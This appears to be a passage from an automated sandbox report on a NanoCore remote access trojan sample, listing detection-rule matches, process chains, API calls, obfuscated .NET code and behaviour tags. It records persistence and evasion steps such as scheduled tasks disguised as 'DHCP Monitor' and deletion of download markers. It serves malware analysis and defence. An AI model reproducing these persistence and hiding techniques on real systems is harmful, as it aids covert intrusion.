        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,13_2_004233A3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBD870 appears 35 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBE2F0 appears 31 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: String function: 00CBD940 appears 51 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00420165 appears 35 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 004359E6 appears 70 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 004014F7 appears 45 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00406B90 appears 73 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00408115 appears 40 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 0040333F appears 36 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 003F1D10 appears 31 times
        Source: C:\Users\user\31956653\xmjk.pifCode function: String function: 00412160 appears 34 times
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA6FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00CA6FC6
        Source: dAkJsQr7A9.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@27/41@10/1
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA6D06 GetLastError,FormatMessageW,0_2_00CA6D06
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00CB963A
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
        Source: dAkJsQr7A9.exeReversingLabs: Detection: 59%
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile read: C:\Users\user\Desktop\dAkJsQr7A9.exeJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\dAkJsQr7A9.exe 'C:\Users\user\Desktop\dAkJsQr7A9.exe'
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
        Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\31956653\xmjk.pif 'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcpJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,4_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004233A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,13_2_004233A3
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00454AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,13_2_00454AEB
        Source: C:\Users\user\31956653\xmjk.pifFile created: C:\Users\user\temp\eblsq.pptJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0045E0F6 CoInitialize,CoCreateInstance,CoUninitialize,13_2_0045E0F6
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0044D606 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,13_2_0044D606
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00423EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,4_2_00423EC5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{ba2baad0-dd3f-4844-a1e3-4d042f9ae8b6}
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: sfxname0_2_00CBCBB8
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: sfxstime0_2_00CBCBB8
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCommand line argument: STARTDLG0_2_00CBCBB8
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: dAkJsQr7A9.exeStatic file information: File size 1103745 > 1048576
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: dAkJsQr7A9.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: dAkJsQr7A9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: dAkJsQr7A9.exe, 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
        Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 00000006.00000003.518192059.00000000013AE000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb, source: xmjk.pif, 00000004.00000003.359156674.0000000001329000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.448460705.0000000001378000.00000004.00000001.sdmp, RegSvcs.exe, 0000000A.00000002.365790263.0000000000692000.00000002.00020000.sdmp, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, RegSvcs.exe, 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, dhcpmon.exe, 0000000F.00000002.370470971.00000000007F2000.00000002.00020000.sdmp, RegSvcs.exe, 00000019.00000000.393856282.00000000007F2000.00000002.00020000.sdmp
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: dAkJsQr7A9.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBE336 push ecx; ret 0_2_00CBE349
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBD870 push eax; ret 0_2_00CBD88E
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00406BD5 push ecx; ret 4_2_00406BE8
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0041D53C push 740041CFh; iretd 13_2_0041D541
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00406BD5 push ecx; ret 13_2_00406BE8
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003FEE30 LoadLibraryA,GetProcAddress,4_2_003FEE30
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653\__tmp_rar_sfx_access_check_6298156Jump to behavior
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 25.2.RegSvcs.exe.bc0000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

        Persistence and Installation Behavior:

        barindex
        Drops PE files with a suspicious file extensionShow sources
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653\xmjk.pifJump to dropped file
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeFile created: C:\Users\user\31956653\xmjk.pifJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file
        Source: C:\Users\user\31956653\xmjk.pifFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_004243FF
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0046A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_0046A2EA
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004243FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_004243FF
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\31956653\xmjk.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
